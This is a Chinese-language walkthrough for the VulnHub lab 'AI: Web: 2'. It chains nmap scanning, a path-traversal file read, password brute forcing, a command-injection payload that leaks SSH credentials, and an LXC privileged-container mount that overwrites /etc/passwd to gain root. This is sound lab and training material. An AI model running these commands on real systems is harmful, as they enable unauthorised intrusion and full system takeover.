AI:WEB:02靶場題解

AI:WEB:02靶場題解

前期準備

鏡像下載

https://www.vulnhub.com/entry/ai-web-2,357/

環境配置：

在VM以net連接打開虛擬機

使用的機器：

攻擊機：kali linux
靶機：ip隨配(192.168.203.136)

滲透開始

1.nmap發現主機，並掃描其ip信息，

nmap --script=vuln 192.168.203.136
發現路徑 /webadmin

使用路徑爆破工具：

檢測存在文件
viewing.php
download.php

2.訪問網頁，並創建登陸賬號，發現文件包含漏洞，讀取文件

訪問網頁，註冊並登陸賬號

訪問文件地址，存在文件包含漏洞，讀取apache默認配置文件路徑
http://192.168.203.136/viewing.php?file_name=…/…/…/…/…/…/…/…/…//etc/apache2/sites-enabled/000-default.conf

讀取文件 .htpasswd

發現賬戶 aiweb2admin

3.爆破賬號密碼

要是你仔細閱讀鏡像安裝界面作者給的描述 https://www.vulnhub.com/entry/ai-web-2,357/，發現提示爆破的字典

字典下載：https://github.com/danielmiessler/SecLists
rockyou-45.txt 存在於路徑 seclists/Passwords/Leaked-Databases

字典，賬號有了，訪問頁面 http://192.168.203.136/webadmin
輸入賬號密碼並抓包

配置好參數，字典爆破：

獲得賬號密碼 aiweb2admin:c.ronaldo
登陸賬號

4.找到命令執行的文件，獲取ssh登陸賬號

命令執行文件：

http://192.168.203.136/webadmin/H05Tpin9555/#

1.127.0.0.1|find . -type f /var/www/html
2. 127.0.0.1|cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt

獲取ssh登陸賬號密碼：
User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf

5.提權

ssh登陸帳號 n0nr00tuser
ssh [email protected]

查看二進制文件
find / -perm -u=s -type f 2>/dev/null
瀏覽完，
這個賬戶對 lxc （https://blog.csdn.net/u011630575/article/details/65444404）命令權限比較大，以此爲突破口，
嘗試創建一個容器，並重新寫入一個root用戶帶有密碼的passwd文件上傳到創建的容器裏，
以此來覆蓋主機上的passwd文件，再提權爲root

lxc start UbuntuMini
lxc config set UbuntuMini security.privileged true
lxc config set UbuntuMini security.nesting true
lxc config device add UbuntuMini sharetesting disk source=/etc path=/sharingiscaring

在主機上新建一個passwd文件，並賦予root密碼killem

root:AzbGfP688Nta.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aiweb2:x:1000:1000::/home/aiweb2:/bin/bash
n0nr00tuser:x:1001:1001::/home/n0nr00tuser:/bin/bash

在執行命令，將passwd上傳到容器裏
lxc file push passwd UbuntuMini/sharingiscaring/passwd

提權：

su -root
輸入密碼
whoami
cat /root/flag.txt